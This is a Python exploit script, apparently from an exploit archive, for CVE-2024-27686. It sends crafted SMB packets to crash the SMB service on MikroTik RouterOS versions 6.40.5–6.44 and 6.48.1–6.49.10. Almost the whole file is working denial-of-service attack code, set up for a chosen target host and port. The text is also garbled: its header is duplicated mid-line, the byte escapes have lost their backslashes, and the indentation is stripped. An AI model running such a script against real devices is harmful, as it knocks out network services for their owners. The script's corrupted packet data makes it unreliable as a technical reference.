# Google Dork: N/A
# Date: 03/04/2024
# Exploit Author: ice-wzl, Solstice Cyber Solutions
# Vendor Homepage: https://mikrotik.com/ # Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS
# Google Dork: N/A
# Date: 03/04/2024
# Exploit Author: ice-wzl, Solstice Cyber Solutions
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download/archive
# Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# CVE : CVE-2024-27686
#!/usr/bin/python3
# Founded by ice-wzl in conjunction with Solstice Cyber Solutions
import argparse
import sys
import socket
# Define the packets
# the packet that causes crash 6.40.5 - 6.42.3
fuzzed_packet_6 = b'x00x00x00nxfeSMB@x00x00x00x00x00x00x00x03x00xf1x1fx08x00x00x00x00x00x00xe1xbex82x00x03x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00Gxe5x07xf5x07xecx01uxe4Q]x9exeaxednxa9 x00x00x00Hx00&x00\x00\x001x009x002x00.x001x006x008x00.x001x005x00.x007x007x00\x00px00ux00bx00'
packet_0 = b'x00x00x00xeaxfeSMB@x00x00x00x00x00x00x00x00x00x1fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00$x00x05x00x01x00x00x00x7fx00x00x00xe8xe4*x99xc9xebxb6Exa2Axe9(xee%xe5xdfpx00x00x00x04x00x00x00x02x02x10x02x00x03x02x03x11x03x00x00x01x00&x00x00x00x00x00x01x00 x00x01x00_xf7mxf2h*x8fx8aex0f8+T=Na8_x0b@Cx82xe7x87xc3qZxd7xcf0Mx87x00x00x02x00 x00x00x00x00x00x04x00x02x00x01x00x04x00x03x00x00x00x00x00x00x00x08x00x08x00x00x00x00x00x03x00x02x00x01x00x00x00x05x00x1ax00x00x00x00x001x009x002x00.x001x006x008x00.x001x005x00.x008x004x00'
packet_2_fuzzed = b'x00x00x00xa2xfeSMB@x00x00x00x00x00x00x00x01x00x00 x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x19x00x00x01x01x00x00x00x00x00x00x00Xx00Jx00x00x00x00x00x00x00x00x00`Hx05x06+x06x01x05x05x02xa0>0<xa0x0e21540373xedxbaxad211x0cx06 +x06x01x04x01x82294517887446830x02x02 xa2*x04(NTLMSSPx00x01x00x00x00x15x82x08bx00x00x00x00(x00x00x00x00x00x00x00(x00x00x00x06x01x00x00x00x00x00x0f'
def open_connection(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
return s
except ConnectionRefusedError:
print(f"[!] Connection Refused on: {ip} {port}")
sys.exit(2)
def send_payload_high(s):
s.send(packet_0)
s.send(packet_2_fuzzed)
s.close()
def send_payload_low(s):
s.send(fuzzed_packet_6)
s.close()
def verify_input(user_inp):
try:
user_inp = int(user_inp)
if user_inp > 2 or user_inp < 1:
return 3
else:
return user_inp
except ValueError:
return 0
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='SMB Crash',
description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10',
epilog='Discovered by: ice-wzl')
parser.add_argument("-t", "--target", action="store", dest="target")
parser.add_argument("-p", "--port", action="store", dest="port")
args = parser.parse_args()
if not args.target or not args.port:
print(f"[+] python3 {sys.argv[0]} --help")
sys.exit(1)
print("[+] What version is the target: [1] 6.40.5 - 6.44 [2] 6.48.1 - 6.49.10 Enter 1 or 2:")
version_choice = input("--> ")
if verify_input(version_choice) == 0:
print("Please enter a number...")
sys.exit(3)
elif verify_input(version_choice) == 3:
print("Please enter a number between 1 and 2")
sys.exit(4)
if verify_input(version_choice) == 1:
if args.port:
get_connect = open_connection(args.target, int(args.port))
send_payload_low(get_connect)
print(f"[+] Sent DOS to {args.target} on {args.port}")
else:
get_connect = open_connection(args.target, 445)
send_payload_low(get_connect)
print(f"[+] Sent DOS to {args.target} on 445")
if verify_input(version_choice) == 2:
if args.port:
get_connect = open_connection(args.target, int(args.port))
send_payload_high(get_connect)
print(f"[+] Sent DOS to {args.target} on {args.port}")
else:
get_connect = open_connection(args.target, 445)
send_payload_high(get_connect)
print(f"[+] Sent DOS to {args.target} on 445")